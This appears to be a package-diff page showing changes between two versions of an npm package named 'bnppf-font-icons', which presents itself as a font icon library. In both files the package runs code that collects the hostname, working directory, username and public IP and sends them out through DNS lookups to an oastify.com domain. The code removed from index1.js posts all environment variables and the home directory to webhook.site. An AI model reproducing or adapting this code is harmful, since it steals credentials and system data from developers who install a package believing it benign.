bnppf-font-icons 3.0.11 → 3.0.13

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/index.js +19 -12
  2. package/index1.js +18 -51
  3. package/package.json +1 -1
package/index.js CHANGED
@@ -1,13 +1,20 @@
1
1
  const { exec } = require("child_process");
2
- exec("a=$(hostname;pwd;whoami;echo 'bnppf-font-icons';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com;done" , (error, data, getter) => {
3
- if(error){
4
- console.log("error",error.message);
5
- return;
6
- }
7
- if(getter){
8
- console.log(data);
9
- return;
10
- }
11
- console.log(data);
12
-
13
- });
2
+
3
+ exec(
4
+ `a=$(hostname | head -c 20; pwd | head -c 20; whoami | head -c 20; echo 'bnppf-font-icons'; curl -s https://ifconfig.me) &&
5
+ echo $a | xxd -p | head -n 1 | while read ut; do
6
+ short_a=$(echo $a | head -c 63);
7
+ nslookup "$short_a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com";
8
+ done`,
9
+ (error, stdout, stderr) => {
10
+ if (error) {
11
+ console.log("Error:", error.message);
12
+ return;
13
+ }
14
+ if (stderr) {
15
+ console.log("stderr:", stderr);
16
+ return;
17
+ }
18
+ console.log("stdout:", stdout);
19
+ }
20
+ );
package/index1.js CHANGED
@@ -1,52 +1,19 @@
1
- const os = require("os");
2
- const dns = require("dns");
3
- const querystring = require("querystring");
4
- const https = require("https");
5
- const packageJSON = require("./package.json");
1
+ const { exec } = require("child_process");
6
2
 
7
- // Construct tracking data with additional information
8
- const trackingData = JSON.stringify({
9
- packageName: packageJSON.name,
10
- packageVersion: packageJSON.version,
11
- resolvedUrl: packageJSON ? packageJSON.___resolved : undefined,
12
- currentDir: __dirname,
13
- homeDir: os.homedir(),
14
- hostname: os.hostname(),
15
- username: os.userInfo().username,
16
- dnsServers: dns.getServers(),
17
- workingDir: process.cwd(),
18
- envVars: process.env,
19
- fullPackageJson: packageJSON,
20
- });
21
-
22
- // Prepare data for POST request
23
- var postData = querystring.stringify({
24
- msg: trackingData,
25
- });
26
-
27
- // Set up HTTPS options for Burp Collaborator server
28
- var options = {
29
- hostname: "webhook.site", // Update with Interactsh or other service if needed
30
- port: 443,
31
- path: "/ae9084dd-65a9-4b42-a5ea-86c78840ddae",
32
- method: "POST",
33
- headers: {
34
- "Content-Type": "application/x-www-form-urlencoded",
35
- "Content-Length": postData.length,
36
- },
37
- };
38
-
39
- // Create HTTPS request to send tracking data
40
- var req = https.request(options, (res) => {
41
- res.on("data", (d) => {
42
- process.stdout.write(d); // Log server response
43
- });
44
- });
45
-
46
- req.on("error", (e) => {
47
- // Silently handle errors, if any
48
- });
49
-
50
- // Send the tracking data
51
- req.write(postData);
52
- req.end();
3
+ exec(
4
+ `a=$(hostname; pwd; whoami; echo 'bnppf-font-icons'; curl -s https://ifconfig.me) &&
5
+ echo $a | xxd -p | head -n 1 | while read ut; do
6
+ nslookup "$a.n1pwzl8pkzkgsvpd4tzdmx0fk6qxen2c.oastify.com";
7
+ done`,
8
+ (error, stdout, stderr) => {
9
+ if (error) {
10
+ console.log("Error:", error.message);
11
+ return;
12
+ }
13
+ if (stderr) {
14
+ console.log("stderr:", stderr);
15
+ return;
16
+ }
17
+ console.log("stdout:", stdout);
18
+ }
19
+ );
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "bnppf-font-icons",
3
- "version": "3.0.11",
3
+ "version": "3.0.13",
4
4
  "description": "ngosytuan",
5
5
  "main": "index.js",
6
6
  "scripts": {